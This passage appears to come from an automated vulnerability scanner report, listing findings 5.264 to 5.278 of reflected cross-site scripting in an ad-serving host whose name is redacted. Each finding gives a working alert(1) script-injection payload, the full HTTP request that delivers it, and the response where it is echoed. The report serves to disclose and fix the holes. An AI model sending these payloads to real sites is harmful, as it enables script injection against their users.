User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 1814
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:50 GMT

<SCRIPT Language="Javascript">
var DCcode="N4319.msn/B2087123.383;sz=728x90;";
var DCwidth="728";
var DCheight="90";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var iframesrc = "http://ad.doubleclick.net/adi/" + DCcode + ";sz=" + DCwidth + "x" + DCheight + ";ord=" + randNum + "?click=&aaf4f"-alert(1)-"841113d9fd6=1http://clk.redcated/goiframe/196246454.198101735/148848786/direct/01%3fhref=";
var scriptsrc = "http://ad.doubleclick.net/adi/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + rand
...[SNIP]...

5.264. http://redcated/BEL/iview/262582811/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/BEL/iview/262582811/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9888"><script>alert(1)</script>cc40f9e2ce0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /BEL/iview/262582811/direct;/01?click=&b9888"><script>alert(1)</script>cc40f9e2ce0=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 278
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:44 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/184054348/262582811/direct/01" onclick="(new Image).src='&b9888"><script>alert(1)</script>cc40f9e2ce0=1http://t.redcated'"><i
...[SNIP]...

5.265. http://redcated/CNT/iview/286609711/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d60d2'%3b889c50d9e7 was submitted in the REST URL parameter 4. This input was echoed as d60d2';889c50d9e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /CNT/iview/286609711/directd60d2'%3b889c50d9e7 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6858
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:24 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_234x60</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-wi
...[SNIP]...
aram name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_234x60.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286609711/directd60d2';889c50d9e7;ai.198086407;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/286609711/directd60d2';889c50d9e7;ai.198086407;ct.1/01" />
...[SNIP]...

5.266. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ff63"-alert(1)-"b8cabc26dc6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&5ff63"-alert(1)-"b8cabc26dc6=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7361
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:09 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
ghtVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91294248915129();
var _CP91294248915129_Instance =
{
click : "http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&5ff63"-alert(1)-"b8cabc26dc6=1",
clickThruUrl: "http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

5.267. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7dd'-alert(1)-'7cad214e775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&df7dd'-alert(1)-'7cad214e775=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7354
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:10 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
248915129.replace(/!~!click!~!/g,'');
else
_strContentCP91294248915129 = _strContentCP91294248915129.replace(/!~!click!~!/g,'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&df7dd'-alert(1)-'7cad214e775=1');
}
else
{
_strContentCP91294248915129 = '<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adcli
...[SNIP]...

5.268. http://redcated/CNT/iview/286609711/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb2a"><script>alert(1)</script>3d3a34b2b9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a"><script>alert(1)</script>3d3a34b2b9b=1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7436
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:52:07 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a"><script>alert(1)</script>3d3a34b2b9b=1\')(new Image).src=\'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\&3fb2a">
...[SNIP]...

5.269. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9006</script><script>alert(1)</script>8f405b36698 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\e9006</script><script>alert(1)</script>8f405b36698 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7456
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:52 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
ightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCP91294248915129();
var _CP91294248915129_Instance =
{
click : "http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\e9006</script><script>alert(1)</script>8f405b36698",
clickThruUrl: "http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

5.270. http://redcated/CNT/iview/286609711/direct [wi.300;hi.250/direct/01/181503410?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/286609711/direct

Issue detail

The value of the wi.300;hi.250/direct/01/181503410?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53626'-alert(1)-'73c6470eb21 was submitted in the wi.300;hi.250/direct/01/181503410?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\53626'-alert(1)-'73c6470eb21 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7346
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:53 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
4248915129.replace(/!~!click!~!/g,'');
else
_strContentCP91294248915129 = _strContentCP91294248915129.replace(/!~!click!~!/g,'http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\53626'-alert(1)-'73c6470eb21');
}
else
{
_strContentCP91294248915129 = '<a target="_blank" href="http://clk.atdmt.com/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01/" onclick="if(\'http://atl.whitepages.com/adclick
...[SNIP]...

5.271. http://redcated/CNT/iview/287065754/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 808cf'%3b519671d0d4e was submitted in the REST URL parameter 4. This input was echoed as 808cf';519671d0d4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /CNT/iview/287065754/direct808cf'%3b519671d0d4e;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6885
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:19 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
ram name="movie" value="HTTP://ec.atdmt.com/ds/CJCNTCINGCIN/FreePhone_TestEvergreen_011811/FreePhone_TestEvergreen_160x600_011811.swf?ver=1&clickTag1=!~!click!~!http://clk.redcated/go/287065754/direct808cf';519671d0d4e;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01&clickTag=!~!click!~!http://clk.redcated/go/287065754/direct808cf';519671d0d4e;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01" />
...[SNIP]...

5.272. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12e71"><script>alert(1)</script>c77fec40792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&12e71"><script>alert(1)</script>c77fec40792=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6953
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:57 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199704563;ct.1/01/" onclick="if(\'&12e71"><script>alert(1)</script>c77fec40792=1\')(new Image).src=\'&12e71">
...[SNIP]...

5.273. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48a61'-alert(1)-'72d6f3aa6b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&48a61'-alert(1)-'72d6f3aa6b9=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6804
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:04 GMT

<html><head><title>mdfSONY_Online_160x600_122110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;mar
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentCIN1292962199521 = _strContentCIN1292962199521.replace(/!~!click!~!/g,'');
else
_strContentCIN1292962199521 = _strContentCIN1292962199521.replace(/!~!click!~!/g,'&48a61'-alert(1)-'72d6f3aa6b9=1');
}
else
{
_strContentCIN1292962199521 = '<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.195741346;ct.1/01/" onclick="if(\'&48a61'-alert(1)-'
...[SNIP]...

5.274. http://redcated/CNT/iview/287065754/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed550"-alert(1)-"3987c2801f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=&ed550"-alert(1)-"3987c2801f9=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6786
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:35:02 GMT

<html><head><title>mdfMOTO_shop_160x600_122110</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margi
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIN1292967337071();
var _CIN1292967337071_Instance =
{
click : "&ed550"-alert(1)-"3987c2801f9=1",
clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.195764836;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : fu
...[SNIP]...

5.275. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 462ea</script><script>alert(1)</script>69e81c4a77c was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=462ea</script><script>alert(1)</script>69e81c4a77c HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6980
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:47 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginCIN1295373277700();
var _CIN1295373277700_Instance =
{
click : "462ea</script><script>alert(1)</script>69e81c4a77c",
clickThruUrl: "http://clk.redcated/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199704563;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : func
...[SNIP]...

5.276. http://redcated/CNT/iview/287065754/direct [pc.106032482;wi.160;hi.600/01?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/287065754/direct

Issue detail

The value of the pc.106032482;wi.160;hi.600/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d434b'-alert(1)-'d9aa05425d9 was submitted in the pc.106032482;wi.160;hi.600/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click=d434b'-alert(1)-'d9aa05425d9 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6870
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:34:48 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentCIN1295373277700 = _strContentCIN1295373277700.replace(/!~!click!~!/g,'');
else
_strContentCIN1295373277700 = _strContentCIN1295373277700.replace(/!~!click!~!/g,'d434b'-alert(1)-'d9aa05425d9');
}
else
{
_strContentCIN1295373277700 = '<a target="_blank" href="http://clk.atdmt.com/go/287065754/direct;pc.106032482;wi.160;hi.600;ai.199723628;ct.1/01/" onclick="if(\'d434b'-alert(1)-'d9a
...[SNIP]...

5.277. http://redcated/CNT/iview/299297287/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://redcated
Path:	/CNT/iview/299297287/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e8ca"><script>alert(1)</script>65ba48f2cfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/299297287/direct;pc.106028736;wi.300;hi.120/01?click=&3e8ca"><script>alert(1)</script>65ba48f2cfe=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 307
Content-Type: text/html
Expires: 0
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344800-3941560; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:46:39 GMT

<body style=margin:0><a target=_blank href="http://clk.atdmt.com/goiframe/199711109/299297287/direct;pc.106028736;wi.300;hi.120/01" onclick="(new Image).src='&3e8ca"><script>alert(1)</script>65ba48f2cfe=1http://t.redcated'">
...[SNIP]...

5.278. http://redcated/DEN/jview/286026710/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://redcated
Path:	/DEN/jview/286026710/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17047'%3bd5b850e643 was submitted in the REST URL parameter 4. This input was echoed as 17047';d5b850e643 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /DEN/jview/286026710/direct17047'%3bd5b850e643 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6620
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:22:35 GMT
Connection: close

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...
